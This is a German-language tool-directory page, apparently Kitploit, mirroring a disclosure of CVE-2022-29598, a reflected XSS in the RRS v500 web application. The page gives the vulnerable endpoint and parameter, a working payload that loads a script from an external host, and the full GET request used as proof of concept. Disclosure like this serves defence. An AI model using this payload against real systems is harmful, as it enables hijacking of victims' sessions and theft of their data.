Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2022-29598 — Die Anwendung RRS v500 ist anfällig für eine reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke. | Kitploit
Tools/GitHubGitHub/thegetch/cve-2022-29598
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungWebsicherheitPenetrationstests
GitHubthegetch/cve-2022-29598

CVE-2022-29598

Die Anwendung RRS v500 ist anfällig für eine reflektierte Cross-Site-Scripting (XSS)-Sicherheitslücke.

Repository anzeigen
vor 4 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2022-29598 : Reflektiertes Cross-Site-Scripting (XSS) in RSS v500

Mitre-URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29598

NIST-URL: https://nvd.nist.gov/vuln/detail/CVE-2022-29598

Die RRS v500-Anwendung von Solutions Atlantic ist anfällig für eine reflektierte Cross-Site-Scripting (XSS)-Schwachstelle. Die Ausnutzung einer XSS-Schwachstelle könnte es einem Angreifer ermöglichen, sich als das Opfer auszugeben, vertrauliche Daten offenzulegen oder Aktionen durchzuführen, die der Opferbenutzer ausführen darf.

Es wurde festgestellt, dass der Parameter fileName Benutzereingaben akzeptiert und diese in der Serverantwort widerspiegelt. Obwohl vor der Wiedergabe einige Filterungen und Bereinigungen der Benutzereingaben durchgeführt wurden, wie z.B. die Kodierung einiger Sonderzeichen (größer/kleiner als Symbole), konnte aufgrund der Tatsache, dass die Wiedergabe in einem JavaScript-Kontext erfolgte, JavaScript-Code in die Serverantwort eingeschleust werden, wodurch die Einschränkungen umgangen wurden.

Betroffene URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

Verwendetes XSS-Payload:

  • javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';//

Proof of Concept (POC):

Funktionalität 'Dokument anzeigen':

Betroffene URL:

  • /RRSWeb/maint/ShowDocument/ShowDocument.aspx

Die Anwendung kann auf externe Websites verlinken. Wenn ein Link zur externen Website ausgewählt wird, wird eine Anfrage an /RRSWeb/maint/ShowDocument/ShowDocument.aspx mit zwei Parametern gesendet: fileName, der die URL der externen Website enthält, zu der weitergeleitet werden soll, und requestType, der den Wert ExternalLink hat. Solange der Parameter requestType mit seinem Standardwert gesetzt ist, wird alles, was ein Benutzer in den Parameter fileName eingibt, in einen JavaScript-Kontext widergespiegelt, insbesondere innerhalb von window.location.href. Durch die Verwendung eines XSS-Payloads mit einer JavaScript-Direktive kann ein erfolgreicher Reflected-XSS-Angriff erfolgen.

GET-Anfrage mit XSS-Payload:

root@kitploit:~
GET /RRSWeb/maint/ShowDocument/ShowDocument.aspx?requestType=ExternalLink&fileName=javascript:var%20x=document.createElement("script");x.src="https://thegetch.github.io/x";document.body.appendChild(x)';// HTTP/1.1
Host: <REDACTED>
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:97.0) Gecko/20100101 Firefox/97.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Referer: http://<REDACTED>/RRSweb/default.aspx
Cookie: ASP.NET_SessionId=<REDACTED>
Upgrade-Insecure-Requests: 1
Content-Length: 0


Serverantwort:

01_RRS_XSS_Response_JS_Directive

Im Browser gerendert:

02_RRS_XSS_Rendered

Entdeckung

April 2022

  • Eric Getchell - TheGetch
Tool herunterladen